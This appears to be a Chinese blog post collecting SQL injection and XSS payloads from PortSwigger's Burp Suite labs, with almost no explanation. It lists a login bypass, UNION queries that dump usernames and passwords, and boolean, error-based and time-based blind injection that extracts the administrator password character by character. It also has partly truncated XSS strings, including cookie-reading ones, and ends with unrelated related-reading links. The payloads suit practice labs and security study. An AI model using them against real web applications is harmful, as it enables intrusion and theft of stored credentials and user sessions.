• 整理的burp官网的漏洞语句

    一、SQL注入

    where从句
    '+OR+1=1--
    登录绕过
    administrator'--
    union从句
    '+UNION+SELECT+NULL--
    '+UNION+SELECT+NULL,NULL--
    '+UNION+SELECT+'abcdef',NULL,NULL--
    '+UNION+SELECT+'abc','def'--
    '+UNION+SELECT+username,+password+FROM+users--
    '+UNION+SELECT+NULL,'abc'--
    '+UNION+SELECT+NULL,username||'~'||password+FROM+users--
    查询数据库类型
    '+UNION+SELECT+'abc','def'+FROM+dual--
    '+UNION+SELECT+BANNER,+NULL+FROM+v$version--
    '+UNION+SELECT+'abc','def'#
    '+UNION+SELECT+@@version,+NULL#
    列出数据库内容
    '+UNION+SELECT+'abc','def'--
    '+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--
    '+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='users_abcdef'--
    '+UNION+SELECT+username_abcdef,+password_abcdef+FROM+users_abcdef--
    盲注
    TrackingId=xyz' AND '1'='1
    TrackingId=xyz' AND '1'='2
    TrackingId=xyz' AND (SELECT 'a' FROM users LIMIT 1)='a
    TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator')='a
    TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>1)='a
    TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>2)='a
    TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>3)='a
    TrackingId=xyz' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='administrator')='a
    TrackingId=xyz' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='administrator')='§a§
    TrackingId=xyz' AND (SELECT SUBSTRING(password,2,1) FROM users WHERE username='administrator')='a

    TrackingId=xyz'
    TrackingId=xyz''
    TrackingId=xyz'||(SELECT '')||'
    TrackingId=xyz'||(SELECT '' FROM dual)||'
    TrackingId=xyz'||(SELECT '' FROM not-a-real-table)||'
    TrackingId=xyz'||(SELECT '' FROM users WHERE ROWNUM = 1)||'
    TrackingId=xyz'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||'
    TrackingId=xyz'||(SELECT CASE WHEN (1=2) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||'
    TrackingId=xyz'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    TrackingId=xyz'||(SELECT CASE WHEN LENGTH(password)>1 THEN to_char(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    TrackingId=xyz'||(SELECT CASE WHEN LENGTH(password)>2 THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    TrackingId=xyz'||(SELECT CASE WHEN LENGTH(password)>3 THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    TrackingId=xyz'||(SELECT CASE WHEN SUBSTR(password,1,1)='a' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    TrackingId=xyz'||(SELECT CASE WHEN SUBSTR(password,1,1)='§a§' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    TrackingId=xyz'||(SELECT CASE WHEN SUBSTR(password,2,1)='§a§' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    时间盲注
    TrackingId=x'||pg_sleep(10)--
    TrackingId=x'%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--
    TrackingId=x'%3BSELECT+CASE+WHEN+(1=2)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>2)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>3)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,1,1)='a')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,1,1)='§a§')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,2,1)='§a§')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f>+%25remote%3b]>'),'/l')+FROM+dual--
    TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f>+%25remote%3b]>'),'/l')+FROM+dual--

    二、xss

    ">

    javascript:alert(document.cookie)

    "οnmοuseοver="alert(1)

    '-alert(1)-'

    product?productId=1&storeId=">

    {{$on.constructor('alert(1)')()}}

    \'-alert(1)//

    ${alert(1)}

  • 相关阅读:
    HTML & CSS
    ubuntu-18.04 linux-QT版 演示sqlite3增删改查
    Typora导出的PDF目录标题自动加编号
    Qt5开发从入门到精通——第六篇二节( 图像与图片——基础图形的绘制 )
    Air001 TIM16通用定时器作PWM输出和延时使用配置方法
    IDEA 22.2.3 创建web项目及Tomcat部署与服务器初始界面修改(保姆版)
    java基础篇(1)
    多系统架构设计思考
    PINN深度学习求解微分方程系列一:求解框架
    C/C++语言100题练习计划 90——10 进制转 x 进制(进制转换实现)
  • 原文地址:https://blog.csdn.net/tainqiuer123/article/details/125887065